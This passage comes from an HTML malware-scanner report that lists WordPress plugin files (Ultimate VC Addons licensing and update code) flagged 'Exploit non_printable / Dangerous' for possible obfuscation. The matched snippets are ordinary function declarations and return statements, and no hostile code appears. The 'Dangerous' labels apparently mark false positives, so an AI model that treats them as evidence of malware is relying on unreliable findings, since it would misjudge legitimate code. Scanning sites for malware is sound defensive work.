#0000BB">plugin_status</span><span style="color: #007700">, function(</span><span style="color: #0000BB">i</span><span style="color: #007700">,</span><span style="color: #0000BB">res</span><span style="color: #007700">){<br /> if(</span><span style="color: #0000BB">res </span><span style="color: #007700">=== </span><span style="color: #DD0000">'bsf-plugin-installed'</span><span style="color: #007700">) {<br /> </span><span style="color: #0000BB">is_plugin_installed </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">;<br /> </span><span style="color: #0000BB">blank_response </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">;<br /> }<br /> if(...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_361").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/classes/class-bsf-core-update.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.36 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_362" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return; } </span><span style="color: #0000BB">update_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf-updater-version'</span><span style="color: #007700">, </span><span style="color: #0000BB">BSF_UPDATER_VERSION </span><span style="color: #007700">); </span><span style="color: #0000BB">do_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'astra_update_after' </span><span style="color: #007700">); } } } </span><span style="color: #0000BB">BSF_Core_Update</span><span style="color: #007700">::</span><span style="color: #0000BB">get_instance</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_362").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/BSF_License_Manager.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.92 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 35</span><br><table id="file_363" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$license_manager</span><span style="color: #007700">-></span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$license_from_type </span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_activate_license</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$_instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 240</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_edd</span><span style="color: #007700">( </span><span style="color: #0000BB">$license_key </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 251</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_product_info</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 270</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_is_active_license</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 291</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">false by </span><span style="color: #007700">default</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 334</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_remote_license_status</span><span style="color: #007700">( </span><span style="color: #0000BB">$purchase_key</span><span style="color: #007700">, </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">$cached</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">refresh_products_on_license_activae</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">includes</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 394</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">$license_status</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 397</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_product_free</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$is_free</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 404</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_product_info</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$key </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 413</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$all_products</span><span style="color: #007700">[ </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">][ </span><span style="color: #0000BB">$key </span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">license_activation_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_css</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">"bsf_core_license_activation_form_</span><span style="color: #007700">{</span><span style="color: #0000BB">$product_id</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$license_from_type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 636</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 683</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_merge</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$action_links </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_popup_form_markup</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_deactivate_license</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 743</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_license_activation_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 746</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$license_manager</span><span style="color: #007700">-></span><span style="color: #0000BB">license_activation_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$license_from_type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$license_manager</span><span style="color: #007700">-></span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$license_from_type </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_363").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/auto-update/admin-functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 27.96 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 46</span><br><table id="file_364" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$switch</span><span style="color: #007700">; } } if ( ! </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'update_bsf_core_options_callback' </span><span style="color: #007700">) ) { function </span><span style="color: #0000BB">update_bsf_core_options_callback</span><span style="color: #007700">() { </span><span style="color: #0000BB">$option </span><span style="color: #007700">= isset( </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'option'</span><span style="color: #007700">] ) ? </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'option'</span><span style="color: #007700">] ) : </span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #0000BB">$value </span><span style="color: #007700">= isset( </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'value'</span><span style="color: #007700">] ) ? </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'value'</span><span style="color: #007700">]</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$myKeeper</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to de register licence</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_deregister_product_callback' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_deregister_product_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_register_product_callback' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_register_product_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_register_user_callback' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 257</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_register_user_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 283</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'checkdnsrr' </span><span style="color: #007700">) ) {</span>
</span>
